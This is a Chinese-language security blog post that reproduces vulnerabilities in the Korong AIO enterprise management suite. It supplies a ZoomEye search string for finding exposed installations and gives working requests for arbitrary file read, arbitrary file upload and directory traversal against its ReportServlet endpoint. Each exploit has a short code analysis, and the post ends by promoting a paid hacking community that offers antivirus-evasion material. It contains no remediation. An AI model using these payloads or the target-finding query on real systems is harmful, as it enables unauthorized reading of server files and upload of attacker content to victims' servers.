前言

科荣AIO 企业⼀体化管理解决⽅案 通过ERPERP（进销存财务）、OAOA（办公⾃动化）、CRMCRM（客⼾关系管理）、UDPUDP（⾃定义平台），集电⼦商务平台、⽀付平台、ERP 平台、微信平台、移动APP 等解决了众多企业客⼾在管理过程中跨部⻔、多功能、需求多变等通⽤及个性化的问题。

搜索引擎

ZoomEye: "changeAccount('8000')"

漏洞复现

新版本

任意文件读取

http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini

代码分析

当operation的值为getPicFile，将传入的fileName参数值进行判断是否以"/DISK"开头并且不为空，如果不为空并以"/DISK"开头进行截取如：/DISKC/Windows/Win.ini ==>DISKC/Windows/Win.ini，接着判断是否"DISK"开头,如果不为空并以"DISK"开头又进行截取然后拼接: 如DISKC/Windows/Win.ini==>C:/Windows/Win.ini最后进行文件读取下载。

老版本

任意文件上传

POST /ReportServlet?operation=saveFormatFile&fileName=demo.css&language= HTTP/1.1Host: xxxxxxConnection: loseContent-Type: application/x-www-form-urlencodedContent-Length: 2
demo

代码分析

代码很直接获取POST输入流将内容写到指定fileName中，由于fileName未进行过滤导致可以进行越级上传。

目录遍历

http://xxxxxx/ReportServlet?operation=getFileList&path=../../../

代码分析

直接将path带入进行拼接然后遍历输出。

欢 迎 加 入 星 球 ！

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

干货｜史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明

由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号渗透安全团队及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！